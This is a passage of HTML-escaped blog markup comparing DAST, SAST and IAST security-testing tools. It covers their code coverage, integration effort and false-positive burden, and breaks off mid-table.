Scan/Correlate Issues in All Client/FE/BE Layers&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 80.4pt;&quot; valign=&quot;top&quot; width=&quot;107&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Client
  Triggered Sequences&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 76.5pt;&quot; valign=&quot;top&quot; width=&quot;102&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.0in;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 71.75pt;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 130.85pt;&quot; valign=&quot;top&quot; width=&quot;174&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;3&lt;sup&gt;rd&lt;/sup&gt; Party Code&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
Closed Source Libraries/Entry-Points&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 80.4pt;&quot; valign=&quot;top&quot; width=&quot;107&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;For “Visible”
  Methods&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 76.5pt;&quot; valign=&quot;top&quot; width=&quot;102&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;No DE-compilation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.0in;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 71.75pt;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 130.85pt;&quot; valign=&quot;top&quot; width=&quot;174&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;Dead/Blocked Code&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
Non-Web Executable&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 80.4pt;&quot; valign=&quot;top&quot; width=&quot;107&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 76.5pt;&quot; valign=&quot;top&quot; width=&quot;102&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Most
  Scenarios&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.0in;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 71.75pt;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;u&gt;Conclusion:&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;DAST and SAST tools *typically* support more technologies, and as far as coverage is concerned -&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;DAST&lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;excels in &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;end-to-end coverage (As in scanning the FULL CYCLE of front-end to backend)&lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&amp;nbsp;AND &quot;visible&quot; 3rd-party coverage, but may require manual configuration for complex applications, or at the very least, an effective crawling mechanism that supports the front-end GUI technology.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;SAST&lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;excels in &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;out-of-the-box coverage&lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;, but &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;may &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;lack in 3rd party software coverage (assuming it does not perform de-compilation of 3rd-party libraries), and may requires manual syncing to &quot;identify&quot; associated end-to-end layers. That being said, early in development, it&#39;s probably the most likely method of getting &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;early &lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;feedback on potential vulnerabilities.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;IAST&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;will typically be positioned &lt;/span&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;somewhere between the two&lt;/span&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt; in the various coverage categories - it will require agent distribution to support end-to-end detection (if it is supported at all), but will require less effort to achieve a wide coverage of application entry points (particularly in the case of Passive-IAST), and might have the advantage of potentially providing an &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;in-depth coverage for CLOSED&lt;/span&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt; 3rd-party code/libraries.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/h3&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Integration Effort vs. False Positives Effort&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/h3&gt;
Throughout the development process, in both the early &lt;b&gt;and&lt;/b&gt; later stages, the amount of &lt;b&gt;effort invested &lt;/b&gt;in detecting vulnerabilities can, knowingly or not, play a key role in the success of the SSDLC process.&lt;br /&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For every vulnerability detection solution and for every scenario, resources are required to &lt;b&gt;integrate&lt;/b&gt; the chosen solutions, &lt;b&gt;maintain&lt;/b&gt; the integration (not as easy as it sounds), and&lt;b&gt; go over the
results&lt;/b&gt; to filter high-impact and relevant issues. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since for all the phases there’s a limited amount of human
and IT resources, overly complex integrations can &lt;b&gt;DELAY&lt;/b&gt; (or sometimes even
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;PREVENT&lt;/span&gt;)&lt;/b&gt; the detection of security issues to a point that the benefit of
detecting them early won’t apply, while complex and &lt;b&gt;tedious result analysis &lt;/b&gt;processes
can easily cause the developers to &lt;b&gt;ignore&lt;/b&gt; identified critical issues due the
sheer number of irrelevant results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The overall effort of using each tool, is not always
properly estimated by potential consumers, and for various tool categories, is focused on different
areas.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;br /&gt;
Although the most obvious effort seems to be the initial integration of the vulnerability scanning process (for live instances, code, or combination thereof), the process of verifying which of the results is &lt;b&gt;&lt;span style=&quot;color: cyan;&quot;&gt;REAL&lt;/span&gt;&lt;/b&gt; and &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;EXPLOITABLE&lt;/span&gt;&lt;/b&gt;, to justify mitigation effort, may be just as tedious and even &lt;b&gt;more&lt;/b&gt; time consuming.&lt;br /&gt;
&lt;br /&gt;
To put the upcoming results into proper perspective, it&#39;s crucial to understand that the &lt;b&gt;relative ratio&lt;/b&gt; presented in the various charts is exactly that - &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;relative&lt;/span&gt;&lt;/b&gt;, and that in fact -&lt;b&gt; most modern solutions&lt;/b&gt; are&amp;nbsp;&lt;b&gt;FAR BETTER&lt;/b&gt; in terms of accuracy then previous generations of tools (early DAST / early SAST / fuzzers / parsers). To further emphasize the perspective, assume the accuracy of modern tools falls in the following context when compared to that of previous generation tools:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF-mmSS-s2yHF8JDoaf8oGYm1LwBW_3kVVJjetCWOhKy1kzccFt3-ybRPuLmzjb3ytwXpsguR1zj9jPV7uWvAmrkTDjccdEqWXNdKbBvqtF5tgLseEcRuoYAV5FloqqPRpc5C1TxKt4Fk/s1600/Ratio-Clarification.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF-mmSS-s2yHF8JDoaf8oGYm1LwBW_3kVVJjetCWOhKy1kzccFt3-ybRPuLmzjb3ytwXpsguR1zj9jPV7uWvAmrkTDjccdEqWXNdKbBvqtF5tgLseEcRuoYAV5FloqqPRpc5C1TxKt4Fk/s640/Ratio-Clarification.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;* some MODERN solutions may do much better than in the chart generalizations (and some obviously worse)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
And now, when the relative scale has been clarified, we can begin to compare &lt;b&gt;modern &lt;/b&gt;technologies against each other.&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: large; font-weight: normal;&quot;&gt;Ease of Integration and Maintenance&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/h3&gt;
Integrating a vulnerability detection solution may require different steps, depending on the complexity of the application being assessed.&lt;br /&gt;
&lt;br /&gt;
The requirements will often include defining the scope of the test, providing necessary scan data (credentials / etc), configuring a scan policy, deploying an agent, etc.&lt;br /&gt;
&lt;br /&gt;
The following table describes and assigns various integration/maintenance prerequisites to the relevant solution categories (DAST / SAST / IAST):&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #767171; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;DAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;SAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Passive IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Active IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Deploy Application&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Deploy application Instance or scan an
  existing instance&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: 8.0pt;&quot;&gt;&lt;span style=&quot;font-size: 10.6667px;&quot;&gt;&lt;b&gt;Common&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;; font-size: 16.0pt;&quot;&gt;✔&lt;/span&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 10.6667px;&quot;&gt;Required&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
